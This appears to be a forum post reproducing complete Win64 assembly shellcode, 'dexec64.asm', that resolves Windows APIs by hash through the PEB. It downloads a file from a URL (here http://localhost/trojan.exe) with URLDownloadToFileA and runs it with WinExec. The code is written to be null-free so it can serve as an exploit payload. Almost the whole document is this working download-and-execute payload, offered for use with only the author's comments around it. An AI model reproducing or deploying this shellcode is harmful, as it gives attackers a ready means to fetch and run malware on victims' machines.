win64 (URLDownloadToFileA) download and execute 218+ bytes
[code]<pre>;<br />; dexec64.asm - 218+ bytes (unoptimised)<br />;<br />; Win64 asm code, download & execute file using URLDownloadToFileA moniker & WinExec<br />;<br />; tested on AMD64 running Windows x64 SP1<br />;<br />; there probably are errors in the code, but this is more of an experimental source if nothing else.<br />; send corrections or errors to: 'weiss' wyse101 [at] gmail [dot] com<br />; code is not optimised at all, doesn't contain null bytes, so is possibly suitable for testing exploits on win64<br />;<br />; one of the main stumbling blocks in coding x64 asm on windows is the alignment of the stack.<br />; it must be aligned by 16 bytes because windows uses 128-bit SSE2, otherwise the api call will fail.<br />;<br />; thanx:<br />;<br />; roy g biv/29a - [url]http://www.29a.net/[/url]<br />; Feryno - [url]http://feryno.host.sk[/url]<br />; Tomasz Grysztar - [url]http://flatassembler.org[/url]<br />;<br />format PE64 console 4.0<br />entry entrypoint<br /><br />section '.text' code readable writeable executable ; assumed to be writeable when in memory, no NX obstruction!<br /><br /> ; 1*8 is used rather than 0*8 because it uses null byte<br />LoadLibraryA equ rbp+1*8 ; using rbp is smaller than using ebp on 64-bit<br />WinExec equ rbp+2*8<br />URLDownloadToFileA equ rbp+3*8 ; must be rbp because of 64-bit URLMON base address<br /><br />entrypoint:<br /> jmp get_eip<br />load_dta:<br /> pop rax<br /> push rax<br /> lea r15,[rax-(setup_stack-hashes)]<br /> inc byte [rax-(setup_stack-url_end)] ; nullify tail end of url<br /> inc byte [rax-(setup_stack-fname_end)] ; nullify end of filename<br /> inc byte [rax-(setup_stack-url_mon_end)] ; nullify end of URLMON<br /> ret ; go!<br /><br />hashes:<br /> dw 0bb86h ; LoadLibraryA() 635bbb86<br /> dw 0a333h ; WinExec() 208da333<br /><br /> db 'URLMON',0ffh,0ffh<br />url_mon_end = $-2<br /><br /> dw 05f92h ; URLDownloadToFileA c91e5f92<br /> dq -1<br />fname:<br /> db 'trojan.exe',0ffh ; what to save as<br />fname_end = $-1<br /><br />url:<br /> db 'http://localhost/trojan.exe',0ffh ; where to download file from<br />url_end = $-1<br /><br />get_eip:<br /> call load_dta<br />setup_stack:<br /> add rsp,-(4*8) ; 3 api variables, + 1 for avoiding null :-|<br /> push rsp<br /> pop rbp ; rbp = table of api<br /> mov rdi,rbp ; rdi points to table also<br /> stosq ; doesn't really do anything.<br /> add rsp,-(11*8) ; reserve space for windows, when calling api<br /><br /> push 60h ; Hello, Ratter. 8-D<br /> pop rcx<br /> mov rax,[gs:rcx] ; Peb<br /> mov rax,[rax+18h] ; PebLdr<br /> mov rsi,[rax+30h] ; Ldr.InInitializationOrderModuleList<br /> lodsq ; skip ntdll.dll<br /> mov rbx,[rax+10h] ; kernel32.dll base<br /><br /> mov cl,2 ; get 2 api first<br />get_apis_loop:<br /> mov eax,dword[rbx+3ch] ; MZ header size<br /> lea rsi,[rbx+rax+78h] ; export directory begins at 88h<br /> mov eax,dword[rsi+10h] ; extra instructions needed to avoid null bytes<br /> lea rsi,[rbx+rax+1ch]<br /><br /> lodsd<br /> lea r9,[rax+rbx]<br /> lodsd<br /> lea r10,[rax+rbx]<br /> lodsd<br /> lea r11,[rax+rbx]<br /> xor r12,r12<br />load_index:<br /> mov esi,dword[r10+4*r12]<br /> add rsi,rbx<br /> inc r12<br /> xor eax,eax<br /> cdq<br />hash_export:<br /> lodsb<br /> add edx,eax<br /> rol edx, 5<br /> dec eax<br /> jns hash_export<br /> ror edx, 5<br /> cmp dx,word [r15] ; found api?<br /> jne load_index<br /><br /> movzx edx,word [r11+2*r12-2]<br /> mov eax,[r9+4*rdx]<br /> add rax,rbx<br /> add r15,2 ; skip hash<br /><br /> stosq ; save api address<br /> loop get_apis_loop<br /><br /> push r15 ; push/pop to avoid null with mov<br /> pop rcx<br /> call qword[LoadLibraryA]<br /><br /> xchg rax,rbx<br /> add r15,8 ; skip URLMON, first time.<br /> push 1 ; get 1 api from URLMON<br /> pop rcx<br /> test rbx,rbx ; continue if not zero<br /> jne get_apis_loop<br /><br /> dec ecx<br /> push rbx<br /> sub rsp,3*8 ; needed to align stack<br /> xor r9,r9<br /> mov r8,r15<br /> lea rdx,[r8+(url-fname)]<br /> call qword[URLDownloadToFileA]<br /><br /> push 1<br /> pop rdx<br /> mov rcx,r15<br /> call qword[WinExec] ; WinExec("trojan.exe",SW_SHOWNORMAL??);<br /><br /> ;jmp $ ; hang<br /><br /> call qword[ExitProcess] ; not required, testing only<br /><br />; section below not required, simply for testing.<br />section '.idata' import data readable writeable<br /><br /> dd 0,0,0,RVA kernel_name,RVA kernel_table<br /> dd 0,0,0,0,0<br /><br /> kernel_table:<br /> ExitProcess dq RVA _ExitProcess<br /> dq 0<br /><br /> kernel_name db 'KERNEL32.DLL',0<br /><br /> _ExitProcess dw 0<br /> db 'ExitProcess',0<br /><br />[/code]<br /></pre>页:
[1]